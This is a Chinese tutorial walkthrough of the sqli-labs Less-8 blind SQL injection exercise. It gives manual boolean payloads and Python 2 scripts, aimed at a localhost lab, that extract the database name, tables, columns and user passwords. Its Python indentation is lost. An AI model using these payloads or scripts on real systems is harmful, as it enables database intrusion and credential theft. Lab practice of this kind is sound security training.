Less-8 Get - Blind -Boolian Based -Single Quotes
1.原頁面
2.?id=1
3.?id=1’
4.嘗試布爾盲注
代碼存在sql注入漏洞,然而頁面既不會回顯資料,也不會回顯錯誤資訊,我們可以通過構造語句,來判斷資料庫資訊的正确性,再通過頁面的“真”和“假”來識别我們判斷的是否正确
?id=1’ and (length(database()))>0 --+
?id=1’ and (length(database()))<0 --+
5.判斷資料庫第一位
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))>100–+
第一位是否大于100,是就顯示正确,不是就顯示錯誤。
substr()函數:substr(a,b,c)從b位置開始,截取字元串a的c長度ascii()函數:ascii()将某個字元轉換為ascii值
判斷範圍,看看大不大于120
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))>120–+
不大于120 ,縮小範圍看看大不大于115
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))>115–+
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))>114–+
?id=1’%20and%20(select%20ascii(substr(database(),1,1)))=115–+
資料庫名第一位為115 ,我們查下ASCII對照表,第一位是s。
依次判斷資料庫剩下的部分。
6.依次猜測表名
?id=1’ and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101–+
7.依次猜測列名
?id=1’ and (select ascii(substr((select columns_name from information_schema.columns where table_name=’users’ limit 0,1),1,1)))=117–+
依次猜解效率不高,可以通過編寫python 腳本。(搬來了大佬寫的腳本 python27運作)
8.擷取資料庫名和使用者:
# -*- coding:utf8 -*-
import requests
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27' # 這個url要對應你自己的url
payload = " and%20left({d}(),{n})=%27{s}%27%20--%20k"
# 上面兩個可以合并為一個,但沒有必要,(本來就是我拆開的)
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'] # 字典
str1 = "You are in..........." # 就是通過傳回的頁面裡有沒有這個字元串來判斷盲注有沒有成功
# 開始對比database()
database = ''
for i in range(1, 10): # 相當于C語言的for循環1~9 其實這裡應該先判斷database有多長的
for ss in list1: # 相當于for循環周遊list,然後把每一項指派給ss
p = payload.format(d='database', n=i, s=database+ss) # 把payload裡的{d},{n},{s}指派
u = requests.get(url+p) # 通路網頁
# print p
if str1 in u.content: # 如果str在網頁内容裡面
database += ss
print u"正在對比database第", i, u"個字元",
print database
break
print u"對比成功,database為:", database
# 開始對比user()#user也是同理
user = ''
for i in range(1, 20):
for ss in list1:
p = payload.format(d='user', n=i, s=user+ss)
u = requests.get(url+p)
# print p
if str1 in u.content:
user += ss
print u"正在對比user第", i, u"個字元",
print user
break
print u"對比成功,user為:", user
print u"database-->", database
print u"user-->", user
a = raw_input()
9.擷取表名
# -*- coding:utf8 -*-
import requests
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27'
payload = 'and%20ascii(substring((select%20table_name%20from%20information_schema.tables%20where%20table_schema=' \
'database()%20limit%20{t},1),{w},1))={A}%20--%20k'
# 我把上面的substr改成了substring按理說mysql裡substring和substr是一樣的但是如果出錯了記得改回substr
list1 = [64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95, 65, 66, 67, 68, 69, 70, 71,
72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103,
104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44]
str1 = "You are in..........."
tables1 = ''
tables2 = ''
tables3 = ''
tables4 = ''
for i in range(0, 4):
for j in range(1, 10):
for s in list1:
p = payload.format(t=i, w=j, A=s)
u = requests.get(url+p)
if str1 in u.content:
if i == 0:
tables1 += chr(s)
print u"正在對比第1個表,", u"第", j, u"個字元",tables1
elif i == 1:
tables2 += chr(s)
print u"正在對比第2個表,", u"第", j, u"個字元", tables2
elif i == 2:
tables3 += chr(s)
print u"正在對比第3個表,", u"第", j, u"個字元", tables3
elif i == 3:
tables4 += chr(s)
print u"正在對比第4個表,", u"第", j, u"個字元", tables4
break
print 'tables1-->', tables1
print 'tables2-->', tables2
print 'tables3-->', tables3
print 'tables4-->', tables4
a = raw_input()
10.擷取字段名
# -*- coding:utf8 -*-
import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', '.'] # 字典
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27'
payload = '%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security' \
'%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k'
# payload其實就是url的後半部分,也是盲注的關鍵代碼,也可以和url變量合并
column = ['', '', '', '', '']
str1 = 'You are in...........'
# 以上四個變量就是與本次盲注相關的變量了
for j in range(0, 3):
for i in range(1, 9):
for l in list1:
p = payload.format(w=j, n=i, c=column[j]+l)
u = requests.get(url+p)
if str1 in u.content:
column[j] += l
print u'正在對比第', j+1, u'個字段第', i, u'個字元', column[j]
break
for c in range(0, 5):
print 'column', c+1, '-->', column[c]
a = raw_input()
11.擷取使用者名和密碼
# -*- coding:utf8 -*-
import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', '.'] # 字典
url = 'http://127.0.0.1/sqli/Less-8/?id=1%27'
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
str1 = 'You are in...........'
username = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
password = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
for i in range(1, 15):
for j in range(1, 11):
for l in list1:
p = payload.format(n=i, w=j, d=username[i-1]+l)
u = requests.get(url+p)
if str1 in u.content:
username[i-1] += l
print u'正在對比第', i, u'個記錄的username的第', j, u'個字元', username[i-1]
payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
for i in range(1, 15):
for j in range(1, 11):
for l in list1:
p = payload2.format(n=i, w=j, d=password[i-1]+l)
u = requests.get(url+p)
if str1 in u.content:
password[i-1] += l
print u'正在對比第', i, u'個記錄的password的第', j, u'個字元', password[i-1]
print 'id username password'
for i in range(1, 15):
print i, '-', username[i-1], '-', password[i-1]
a = raw_input()
12.也可以使用sqlmap工具